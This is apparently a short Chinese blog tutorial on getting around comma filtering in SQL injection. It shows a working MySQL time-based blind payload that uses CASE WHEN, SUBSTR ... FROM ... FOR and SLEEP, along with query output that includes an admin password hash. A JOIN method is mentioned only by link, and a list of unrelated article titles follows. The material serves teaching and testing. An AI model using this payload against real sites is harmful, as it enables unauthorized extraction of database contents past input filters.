SQL注入之逗号拦截绕过
2024-10-21 03:09:08
目前所知博主仅知的两个方法
1.通过case when then
2.join
[一]case when then
mysql> select * from lbcms_admin where adminname like "%a%" union select 1,2,3,4,5,6,7,case when substr(database() from 1 for 1) = 'l' then sleep(3) else 0 end;
+----+-----------+----------------------------------+----------+-------------+------------+-----------+---------------------+
| ID | adminName | adminPassWord | adminLov | adminConfig | adminClass | adminLock | adminDate |
+----+-----------+----------------------------------+----------+-------------+------------+-----------+---------------------+
| 1 | admin | a797ba2993304483f0d180e25d14319a | 520 | | NULL | SgrRUQ | 2010-04-14 00:00:00 |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 0 |
+----+-----------+----------------------------------+----------+-------------+------------+-----------+---------------------+
2 rows in set (3.00 sec)
相关知识[1]https://www.cnblogs.com/nul1/p/8727873.html
case when 条件1 then 条件2 else 条件3 end; #如果条件1成立就执行条件2否则执行条件3
相关知识[2]https://www.cnblogs.com/nul1/p/9297045.html
from 1 for 1 #分页,前面的1代表截第几个,后面的1代表截取的长度.
[二]join
https://www.cnblogs.com/i-honey/p/8203954.html
最新文章
- iOS开发之SQLite--C语言接口规范(五)——iOS开发使用SQLite实例
- 基于Azure构建PredictionIO和Spark的推荐引擎服务
- RAM和ROM总结
- 小记:Bmob云端代码测试APNS推送功能 #代码片段
- 关于Lua优质文章链接
- Android轻量缓存框架--ASimpleCache
- linux tomcat 配置
- 并发编程之二:wait、notify、notifyAll的使用方法
- global.autoindex dede:global.itemindex 获取子栏目自动排序序号
- socket通信的json数据传输与获取
- 构建自己的Tomcat镜像
- C++、Objective-C 混合编程
- 跨域访问 - 跨域请求 同源策略概念对跨域请求的影响 及几种解决跨域请求的方法如 jsonp
- MySQL内存调优
- 《ASP.NET Core In Action》读书笔记系列四 创建ASP.NET Core 应用步骤及相应CLI命令
- hdu2461 Rectangles 线段树--扫描线
- win7下python2.6如何安装setuptools和pip
- GitHub搭建个人网站详细教程
- 事件响应的优先级、stopProgapation禁止下层组件响应
- Android之数据存储